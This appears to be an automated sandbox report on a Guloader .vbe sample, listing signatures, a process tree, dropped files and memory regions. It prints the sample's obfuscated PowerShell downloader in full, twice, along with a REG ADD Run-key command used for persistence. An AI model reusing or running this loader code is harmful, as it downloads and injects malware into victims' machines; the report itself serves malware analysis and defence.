Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
25-06-2024 01:21
Static task
static1
Behavioral task
behavioral1
Sample
3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee.vbe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee.vbe
Resource
win10v2004-20240508-en
General
-
Target
3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee.vbe
-
Size
9KB
-
MD5
27b373a50962c2f8fe26274c147195cd
-
SHA1
1bba2d71036d371f78d628ac9c6cc13221d9ee89
-
SHA256
3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee
-
SHA512
dde61a1a192e888bd47135be665678b2334efb8d860ec0ea2224e1d17b95da3cbdad3fb79eff428ae99e0514d8e301d2b424c54127f8f621889e95a4ed888111
-
SSDEEP
192:pzu36F4teCvSV/mcS36C2W3E11hEAGst4QoKVYHva607dqh2eyTxN8mSVqn:436Se4z36A3cDt/Rdb8miqn
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2536-25-0x0000000000400000-0x0000000000581000-memory.dmp INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 2056 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Processes:
resource yara_rule behavioral1/memory/2536-25-0x0000000000400000-0x0000000000581000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\Epicarp = "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\\Drivtmmers\\').Loplukkeres;%Easels% ($Videreuddannelses)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2536 wab.exe 2536 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2656 powershell.exe 2536 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2656 set thread context of 2536 2656 powershell.exe wab.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2056 powershell.exe 2656 powershell.exe 2656 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 2236 wrote to memory of 2056 2236 WScript.exe powershell.exe PID 2236 wrote to memory of 2056 2236 WScript.exe powershell.exe PID 2236 wrote to memory of 2056 2236 WScript.exe powershell.exe PID 2056 wrote to memory of 2616 2056 powershell.exe cmd.exe PID 2056 wrote to memory of 2616 2056 powershell.exe cmd.exe PID 2056 wrote to memory of 2616 2056 powershell.exe cmd.exe PID 2056 wrote to memory of 2656 2056 powershell.exe powershell.exe PID 2056 wrote to memory of 2656 2056 powershell.exe powershell.exe PID 2056 wrote to memory of 2656 2056 powershell.exe powershell.exe PID 2056 wrote to memory of 2656 2056 powershell.exe powershell.exe PID 2656 wrote to memory of 2704 2656 powershell.exe cmd.exe PID 2656 wrote to memory of 2704 2656 powershell.exe cmd.exe PID 2656 wrote to memory of 2704 2656 powershell.exe cmd.exe PID 2656 wrote to memory of 2704 2656 powershell.exe cmd.exe PID 2656 wrote to memory of 2536 2656 powershell.exe wab.exe PID 2656 wrote to memory of 2536 2656 powershell.exe wab.exe PID 2656 wrote to memory of 2536 2656 powershell.exe wab.exe PID 2656 wrote to memory of 2536 2656 powershell.exe wab.exe PID 2656 wrote to memory of 2536 2656 powershell.exe wab.exe PID 2656 wrote to memory of 2536 2656 powershell.exe wab.exe PID 2536 wrote to memory of 2944 2536 wab.exe cmd.exe PID 2536 wrote to memory of 2944 2536 wab.exe cmd.exe PID 2536 wrote to memory of 2944 2536 wab.exe cmd.exe PID 2536 wrote to memory of 2944 2536 wab.exe cmd.exe PID 2944 wrote to memory of 1752 2944 cmd.exe reg.exe PID 2944 wrote to memory of 1752 2944 cmd.exe reg.exe PID 2944 wrote to memory of 1752 2944 cmd.exe reg.exe PID 2944 wrote to memory of 1752 2944 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee.vbe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden "cls;write 'Strainableness Vinhandler Unjagtigheder Manipuleringers subsumtionernes Klippegulve Executer Ketogenic Palmeries Stringmaking';$Dramaticism = 1;Function Hkeraands($Uddebatterede254){$Nine=$Uddebatterede254.Length-$Dramaticism;$Uricacidemia='SUBSTRIN';$Uricacidemia+='G';For( $Financieret=4;$Financieret -lt $Nine;$Financieret+=5){$Strainableness+=$Uddebatterede254.$Uricacidemia.Invoke( $Financieret, $Dramaticism);}$Strainableness;}function Karolinger($Oplivelses228){ & ($Sobralia) ($Oplivelses228);}$Overtroubling=Hkeraands 'LevnM KonoS mmzSt.liRen lGudml Ha.adosh/Para5 Hem.Raa 0Ddn, M.li(DamaWUltriDrtrntho,dAn toSprowAbansF rl FestNYechTBryl Roug1Fin.0Ce,l.Cl s0Pult; Tin KlleWAst.iAb,dnTri,6 De 4Omsk;Fors J.hsxFlip6Tegn4Biav;Pro BowlrZambvAdst:r,kl1Accr2Fird1Grn,.Endo0Bala)Beta wennGHandeFlamcStr kIncooFus,/Rel,2No,a0 Le 1Trev0Kult0St.t1Prlu0Acet1Glad AadsFCanciOctar LeneStorfArchoExtex lti/scyt1Void2Camp1Sli.. Mat0 als ';$Disputativeness=Hkeraands 'HoveU SupsI nieForrr Fo.-TaktAReprgDureeSlovnKirstFusi ';$subsumtionernes=Hkeraands ' LymhSvigt TyvtS ukpBort: Mod/ Pa /PatrmBhimaDiscsS.umoDrev.DowngY ere bry/GildwBilapA kl-SkidaMic dMe,omIbruiBlokn ram/Ar,iF EnglRetuuUvitin cod Sa,eDisc.,odoxT,dssRi on Lag ';$underthrust=Hkeraands 'Kva,>stra ';$Sobralia=Hkeraands 'Pyfei NeoeS,pexUmul ';$Sogneraadsmedlemmers='Ketogenic';$Acalycinous = Hkeraands 'Ferte Gy.cShakhGruboK,de Subn% RenaNonmpC,arpfigudTe,oa de.tStvlaSamm%Fors\ ,crCNudiaFlomnjungdPersoDemalKonflUndeeZi.caCalc.,ogtLCamenGen.gDipo .ype&Supe&D ss Ma aeUndfcC.lihBoreoSam. HndtVing ';Karolinger (Hkeraands 'V,lf$Unfig orlW,elo Un b OmkaN dglPhas:DaveOlukrpMedar Ti e ndrgTortnBrn.iLandnFes gsysteHo arPropn Resek.vi=Bo,i( Felc FyrmLatyd,rev Tnk/Bes c Tro Una.$ proACl acDk aaFattlhoveyTermcInc.iFingnSubmoRegau Skyssutt)Forh ');Karolinger (Hkeraands 'Va y$Lng,gV telScoroCymabSympaBepolPrfi: .amMHabeaRegnnRespiNet,pDrukuGei.llaboe F.arCalci St.nTvregKe.peOmpor foss adi=,jem$IsogsKombuBeunbKorrscinnuSt.nmPinwt omi Sn,oSvi nDubhecatar StanOrate reisLup..Fikss,unkpGhoslUd.ri CortS at( Jor$utf,uIns.n ocidSn fe rykr ubpt .pihHornrGoyauT.aus Balt Unn) Zos ');Karolinger (Hkeraands 's,ne[PickNJohneLflatTrem.MomsSun tePiglr CucvfiltiVi lc GreeBal.P,oreos,eaiFlucnks.st irpM.umbaBivenPyr.aStatgAlaneAn.er Pro]Yder:,eas:EsbaS P.seT arcCauduFakerDresi P,ctKni.y Mo.PTrylrSluroTreltSmouoautocNa ooGri,lJord ,yci=Re,e Ind[ RefNHoveeF astGaat.W inSRegieOratc TiluNondrA griPfaltGrnsy.laePunf rMe.lofa.vtLetvovivecOve.oBirdlKjerTStopySlippUnsteGeol]Kali:For,:SmagTOmrylXy ysScil1Apom2Roll ');$subsumtionernes=$Manipuleringers[0];$Unsleeping= (Hkeraands ' Tra$Re egPastlA teoPlasb SixaTonolO,ri:Intec rgeoTriolefteeOut oSstnpStrat SkreChrorTyt.aReprlTak.=stopNKonfeAfvawBrev-C.nvO,tribturajG.eye SticSc,rtFras Wa,nS .oryFa osEightMyele.vermChlo.FolkNIne e TratVisi.DeacWBarneOmfabTredCKysslAuxoiSndreSplenFe it');$Unsleeping+=$Opregningerne[1];Karolinger ($Unsleeping);Karolinger (Hkeraands 'Solu$Cre,cBie oSlg.lHockeCanuoI,dipSmigtNorde TegrSpuraGoallTjen. Ha HAcroe Conat.lvdBlane Asyr Phos Van[Forr$ NecD Br,idrams,rlgp entuIxodtAnteaWardtrefeiViriv ScrevilknIntee FissSnuss R,g]Ferr=Lo.s$AmtsOGebrvForfeUdderKooptEditrRet oTheauU,babIndsl br iL esnScrigInte ');$prebesetting=Hkeraands 'Gla,$PhoscMnteoEnerl PileKlejo arp InstShoweAprerK.aga.yrel ,ub.KokoD ,imoBilfwcontnhassl .azoHarnaRunid L.nFSegriBuillVirteKon (Spru$,remsMe suS udbPa ms SuruBrocmBilltK.liiUnbuoInt nSnareGogorByggnFinheSilksHype, Brn$SemiUBotsn Ligs HeleSofacKalouA,enrSiale unon SemeJyllsafsksTra )Flus ';$Unsecureness=$Opregningerne[0];Karolinger (Hkeraands 'Fors$MicrgLiqulDe.io.karb SanaFr mlInco:IdioP.rane Unsr,intsMagtoSilknVa teNongl Zo,sT,rg=,ane( F,uTNoneePhidsSp.rt B.a- TekPValeaConvtDesphErsa Digi$Se,iUge,lnEnkesPr,mePligcL nguDozer QuieB mbn tjee H vsSnursSpar)Luft ');while (!$Personels) {Karolinger (Hkeraands 'Comm$Ghougdrypl looM lablc caInjul Ca,:.gebPRockiBesml Skre tomwRecoo,edrr Deft angsPres= moi$AfkatGabtr,aalu tileHabi ') ;Karolinger $prebesetting;Karolinger (Hkeraands 'Sto SBermt .smaN adrPiqut Dis-KumuSPrillAnneeProdeBr.ap dog Dv.d4dish ');Karolinger (Hkeraands 'L.kr$ GrugpantlBru onondbOutkaFld l.ilh:Op.iP Bl,eUdforPerisJomfoBid.nBankeBesylAnorsUps =,sbe(cereTSgete,inds,nletEnto-geodPHotdaIdo,tAssohAmni Inde$.ottUTilan resK,raeC olcElvau nflrDdsdeDamrnF,lseRee.sOldwsUna.) ang ') ;Karolinger (Hkeraands 'Bron$HarmgCystlPh.toHmosbOp raBerelRadi: Ov U IbrnAtoljs,itaMucogAufatSkv.iAa yg Helh liteUnd.dBroceDencr Tse=man,$MyrtgDatal Tego Fi.bPigea Sknlbipi:.jtiVLy.tiRe tn OvehSystaScrinMu cd TrilFilme V nrMest+,alt+Sige%Amin$ SidMpr.gaRe,unUnseiSmerp t,eu panlSubseMas rDocuiSc.lnContg ,ubeTiggrPressspon.KlumcL,igoGuiduInvinImpetExtr ') ;$subsumtionernes=$Manipuleringers[$Unjagtigheder];}$Ophrenes121=302900;$Unintoxicating=28604;Karolinger (Hkeraands 'For.$ ,dbgNedtlB dsoTidsbCo maSkrulOver:LejePDvstaSpeclTirsmGambe RadrGl.pi Pare SfysMosa Co,g=Reli RserGJuleeOro.tRke -TogsC lvtoAntanHor tAntre HornSlietFont Udbo$MellUSkolnTearsPro.e juscSnupuSteer Ha,eNidinI dieops sGa,osSkae ');Karolinger (Hkeraands 'Syre$AdgagAur.l.orpoAp.rb.orhave tl all: CuiSBnkem hiaAmbdaSexag ArerDopniEndanlandeElved Fynenavns.aro Trol=Fur, Tull[AftaS adryTingsPrint drneE,spmHimm.Inn.CAs,ro.estnTillvFioreCollrBatwtVita]E hy: soc:,pprFNed rf,rloObj,m ConB GifaVelvsSma,eRhin6Bobl4,ndeSFrittHjttr U,wiUhelnPhysgSpre(Tilv$OcelPCo.kaMi ilForemGrobeKissrRekvi ForeStrasBraz) non ');Karolinger (Hkeraands 'To t$ H,ag Cool ProoSte bSaleaDimelForm:Th,rNMiskuAgnimAbsuiSurpnbrsnoA peu Jags.eltnPreeeU.prsNo.asA et Test=Gi u Pen[,larSSwanyThebsGardt Undepa tm Sym.CounT La,e FljxF.rmtreac.VagoE VernMudhcLarmoLemud B eiTa,hnIn sg viz]Pink:Ptil:Sy.lA UdpSTilsCFontIB muIWhut.Per G St,eDu,ctNonsS DowtHalvrRebliYawlnRvejgTele(Svej$PummSK olmTomaaHo,eaOptagF inr nexiAr hnNovoeMafid ,rue.eeks Cha)Skil ');Karolinger (Hkeraands 'V,lg$,lasg.idelS.reoHypob divaEpiclhvss:Lu alPhoba queyAmorl st.aUkal= Ka.$ palNSco.u No,mDekaiMaldn Rano.anduOr.ns sotnAfsoe Kams,andsA.se. phosAfg,uLbetb ,hos Af,tEuskropspiTelenUnshg Ind( Tud$Key,OEntup GibhFygerUngre idenChefeJ ersSepa1 Tor2 Fo 1Glor,Mu,t$ Hy,U .udnHereiRepanC,axt uroBrnex.ncaiCoffcDendaPhottSinkiSovsn OpegKlat)Disp ');Karolinger $layla;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Candollea.Lng && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Strainableness Vinhandler Unjagtigheder Manipuleringers subsumtionernes Klippegulve Executer Ketogenic Palmeries Stringmaking';$Dramaticism = 1;Function Hkeraands($Uddebatterede254){$Nine=$Uddebatterede254.Length-$Dramaticism;$Uricacidemia='SUBSTRIN';$Uricacidemia+='G';For( $Financieret=4;$Financieret -lt $Nine;$Financieret+=5){$Strainableness+=$Uddebatterede254.$Uricacidemia.Invoke( $Financieret, $Dramaticism);}$Strainableness;}function Karolinger($Oplivelses228){ & ($Sobralia) ($Oplivelses228);}$Overtroubling=Hkeraands 'LevnM KonoS mmzSt.liRen lGudml Ha.adosh/Para5 Hem.Raa 0Ddn, M.li(DamaWUltriDrtrntho,dAn toSprowAbansF rl FestNYechTBryl Roug1Fin.0Ce,l.Cl s0Pult; Tin KlleWAst.iAb,dnTri,6 De 4Omsk;Fors J.hsxFlip6Tegn4Biav;Pro BowlrZambvAdst:r,kl1Accr2Fird1Grn,.Endo0Bala)Beta wennGHandeFlamcStr kIncooFus,/Rel,2No,a0 Le 1Trev0Kult0St.t1Prlu0Acet1Glad AadsFCanciOctar LeneStorfArchoExtex lti/scyt1Void2Camp1Sli.. Mat0 als ';$Disputativeness=Hkeraands 'HoveU SupsI nieForrr Fo.-TaktAReprgDureeSlovnKirstFusi ';$subsumtionernes=Hkeraands ' LymhSvigt TyvtS ukpBort: Mod/ Pa /PatrmBhimaDiscsS.umoDrev.DowngY ere bry/GildwBilapA kl-SkidaMic dMe,omIbruiBlokn ram/Ar,iF EnglRetuuUvitin cod Sa,eDisc.,odoxT,dssRi on Lag ';$underthrust=Hkeraands 'Kva,>stra ';$Sobralia=Hkeraands 'Pyfei NeoeS,pexUmul ';$Sogneraadsmedlemmers='Ketogenic';$Acalycinous = Hkeraands 'Ferte Gy.cShakhGruboK,de Subn% RenaNonmpC,arpfigudTe,oa de.tStvlaSamm%Fors\ ,crCNudiaFlomnjungdPersoDemalKonflUndeeZi.caCalc.,ogtLCamenGen.gDipo .ype&Supe&D ss Ma aeUndfcC.lihBoreoSam. HndtVing ';Karolinger (Hkeraands 'V,lf$Unfig orlW,elo Un b OmkaN dglPhas:DaveOlukrpMedar Ti e ndrgTortnBrn.iLandnFes gsysteHo arPropn Resek.vi=Bo,i( Felc FyrmLatyd,rev Tnk/Bes c Tro Una.$ proACl acDk aaFattlhoveyTermcInc.iFingnSubmoRegau Skyssutt)Forh ');Karolinger (Hkeraands 'Va y$Lng,gV telScoroCymabSympaBepolPrfi: .amMHabeaRegnnRespiNet,pDrukuGei.llaboe F.arCalci St.nTvregKe.peOmpor foss adi=,jem$IsogsKombuBeunbKorrscinnuSt.nmPinwt omi Sn,oSvi nDubhecatar StanOrate reisLup..Fikss,unkpGhoslUd.ri CortS at( Jor$utf,uIns.n ocidSn fe rykr ubpt .pihHornrGoyauT.aus Balt Unn) Zos ');Karolinger (Hkeraands 's,ne[PickNJohneLflatTrem.MomsSun tePiglr CucvfiltiVi lc GreeBal.P,oreos,eaiFlucnks.st irpM.umbaBivenPyr.aStatgAlaneAn.er Pro]Yder:,eas:EsbaS P.seT arcCauduFakerDresi P,ctKni.y Mo.PTrylrSluroTreltSmouoautocNa ooGri,lJord ,yci=Re,e Ind[ RefNHoveeF astGaat.W inSRegieOratc TiluNondrA griPfaltGrnsy.laePunf rMe.lofa.vtLetvovivecOve.oBirdlKjerTStopySlippUnsteGeol]Kali:For,:SmagTOmrylXy ysScil1Apom2Roll ');$subsumtionernes=$Manipuleringers[0];$Unsleeping= (Hkeraands ' Tra$Re egPastlA teoPlasb SixaTonolO,ri:Intec rgeoTriolefteeOut oSstnpStrat SkreChrorTyt.aReprlTak.=stopNKonfeAfvawBrev-C.nvO,tribturajG.eye SticSc,rtFras Wa,nS .oryFa osEightMyele.vermChlo.FolkNIne e TratVisi.DeacWBarneOmfabTredCKysslAuxoiSndreSplenFe it');$Unsleeping+=$Opregningerne[1];Karolinger ($Unsleeping);Karolinger (Hkeraands 'Solu$Cre,cBie oSlg.lHockeCanuoI,dipSmigtNorde TegrSpuraGoallTjen. Ha HAcroe Conat.lvdBlane Asyr Phos Van[Forr$ NecD Br,idrams,rlgp entuIxodtAnteaWardtrefeiViriv ScrevilknIntee FissSnuss R,g]Ferr=Lo.s$AmtsOGebrvForfeUdderKooptEditrRet oTheauU,babIndsl br iL esnScrigInte ');$prebesetting=Hkeraands 'Gla,$PhoscMnteoEnerl PileKlejo arp InstShoweAprerK.aga.yrel ,ub.KokoD ,imoBilfwcontnhassl .azoHarnaRunid L.nFSegriBuillVirteKon (Spru$,remsMe suS udbPa ms SuruBrocmBilltK.liiUnbuoInt nSnareGogorByggnFinheSilksHype, Brn$SemiUBotsn Ligs HeleSofacKalouA,enrSiale unon SemeJyllsafsksTra )Flus ';$Unsecureness=$Opregningerne[0];Karolinger (Hkeraands 'Fors$MicrgLiqulDe.io.karb SanaFr mlInco:IdioP.rane Unsr,intsMagtoSilknVa teNongl Zo,sT,rg=,ane( F,uTNoneePhidsSp.rt B.a- TekPValeaConvtDesphErsa Digi$Se,iUge,lnEnkesPr,mePligcL nguDozer QuieB mbn tjee H vsSnursSpar)Luft ');while (!$Personels) {Karolinger (Hkeraands 'Comm$Ghougdrypl looM lablc caInjul Ca,:.gebPRockiBesml Skre tomwRecoo,edrr Deft angsPres= moi$AfkatGabtr,aalu tileHabi ') ;Karolinger $prebesetting;Karolinger (Hkeraands 'Sto SBermt .smaN adrPiqut Dis-KumuSPrillAnneeProdeBr.ap dog Dv.d4dish ');Karolinger (Hkeraands 'L.kr$ GrugpantlBru onondbOutkaFld l.ilh:Op.iP Bl,eUdforPerisJomfoBid.nBankeBesylAnorsUps =,sbe(cereTSgete,inds,nletEnto-geodPHotdaIdo,tAssohAmni Inde$.ottUTilan resK,raeC olcElvau nflrDdsdeDamrnF,lseRee.sOldwsUna.) ang ') ;Karolinger (Hkeraands 'Bron$HarmgCystlPh.toHmosbOp raBerelRadi: Ov U IbrnAtoljs,itaMucogAufatSkv.iAa yg Helh liteUnd.dBroceDencr Tse=man,$MyrtgDatal Tego Fi.bPigea Sknlbipi:.jtiVLy.tiRe tn OvehSystaScrinMu cd TrilFilme V nrMest+,alt+Sige%Amin$ SidMpr.gaRe,unUnseiSmerp t,eu panlSubseMas rDocuiSc.lnContg ,ubeTiggrPressspon.KlumcL,igoGuiduInvinImpetExtr ') ;$subsumtionernes=$Manipuleringers[$Unjagtigheder];}$Ophrenes121=302900;$Unintoxicating=28604;Karolinger (Hkeraands 'For.$ ,dbgNedtlB dsoTidsbCo maSkrulOver:LejePDvstaSpeclTirsmGambe RadrGl.pi Pare SfysMosa Co,g=Reli RserGJuleeOro.tRke -TogsC lvtoAntanHor tAntre HornSlietFont Udbo$MellUSkolnTearsPro.e juscSnupuSteer Ha,eNidinI dieops sGa,osSkae ');Karolinger (Hkeraands 'Syre$AdgagAur.l.orpoAp.rb.orhave tl all: CuiSBnkem hiaAmbdaSexag ArerDopniEndanlandeElved Fynenavns.aro Trol=Fur, Tull[AftaS adryTingsPrint drneE,spmHimm.Inn.CAs,ro.estnTillvFioreCollrBatwtVita]E hy: soc:,pprFNed rf,rloObj,m ConB GifaVelvsSma,eRhin6Bobl4,ndeSFrittHjttr U,wiUhelnPhysgSpre(Tilv$OcelPCo.kaMi ilForemGrobeKissrRekvi ForeStrasBraz) non ');Karolinger (Hkeraands 'To t$ H,ag Cool ProoSte bSaleaDimelForm:Th,rNMiskuAgnimAbsuiSurpnbrsnoA peu Jags.eltnPreeeU.prsNo.asA et Test=Gi u Pen[,larSSwanyThebsGardt Undepa tm Sym.CounT La,e FljxF.rmtreac.VagoE VernMudhcLarmoLemud B eiTa,hnIn sg viz]Pink:Ptil:Sy.lA UdpSTilsCFontIB muIWhut.Per G St,eDu,ctNonsS DowtHalvrRebliYawlnRvejgTele(Svej$PummSK olmTomaaHo,eaOptagF inr nexiAr hnNovoeMafid ,rue.eeks Cha)Skil ');Karolinger (Hkeraands 'V,lg$,lasg.idelS.reoHypob divaEpiclhvss:Lu alPhoba queyAmorl st.aUkal= Ka.$ palNSco.u No,mDekaiMaldn Rano.anduOr.ns sotnAfsoe Kams,andsA.se. phosAfg,uLbetb ,hos Af,tEuskropspiTelenUnshg Ind( Tud$Key,OEntup GibhFygerUngre idenChefeJ ersSepa1 Tor2 Fo 1Glor,Mu,t$ Hy,U .udnHereiRepanC,axt uroBrnex.ncaiCoffcDendaPhottSinkiSovsn OpegKlat)Disp ');Karolinger $layla;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Candollea.Lng && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epicarp" /t REG_EXPAND_SZ /d "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\Drivtmmers\').Loplukkeres;%Easels% ($Videreuddannelses)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epicarp" /t REG_EXPAND_SZ /d "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\Drivtmmers\').Loplukkeres;%Easels% ($Videreuddannelses)"6⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Candollea.LngFilesize
431KB
MD51108e06376421f62462c79cc5ffc66e6
SHA18a274698fc2796c729b3b849197607468361031d
SHA256976127a2f0eae89e47e054f75ebe9e4218b264071a11411ce77b20d4124431fb
SHA5129cdffb2ba2d7b7e62b528a8b9009cefdd65348b68f7fbfd78ad33372fde47ca7c73625c6fc47e458adf5ef5ae355b6756fa871257370bc258bdc51253168ba4a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SW5WHW0P6YCX1TAX5XD7.tempFilesize
7KB
MD5686c41f445e50c9cc3bee452ef3793e8
SHA1a61b5112096350f71030dbfa927a9485fbecb57f
SHA256094c1ee6f77f966de51f0da85117ac238f4fefcb8c541e2879716cc19f0e2776
SHA512d5a390995468e20da9299c65829765551330736b95203b1e207bc49110560e494045f3af522e9a5d5646433015103fb8634464941d28f559e9020cf5fa353fde
-
memory/2056-8-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmpFilesize
9.6MB
-
memory/2056-5-0x000000001B670000-0x000000001B952000-memory.dmpFilesize
2.9MB
-
memory/2056-4-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmpFilesize
4KB
-
memory/2056-9-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmpFilesize
9.6MB
-
memory/2056-10-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmpFilesize
9.6MB
-
memory/2056-11-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmpFilesize
9.6MB
-
memory/2056-6-0x0000000001DF0000-0x0000000001DF8000-memory.dmpFilesize
32KB
-
memory/2056-7-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmpFilesize
9.6MB
-
memory/2056-26-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmpFilesize
9.6MB
-
memory/2056-18-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmpFilesize
9.6MB
-
memory/2056-19-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmpFilesize
4KB
-
memory/2536-25-0x0000000000400000-0x0000000000581000-memory.dmpFilesize
1.5MB
-
memory/2536-23-0x0000000000820000-0x0000000004EEB000-memory.dmpFilesize
70.8MB
-
memory/2656-17-0x0000000006950000-0x000000000B01B000-memory.dmpFilesize
70.8MB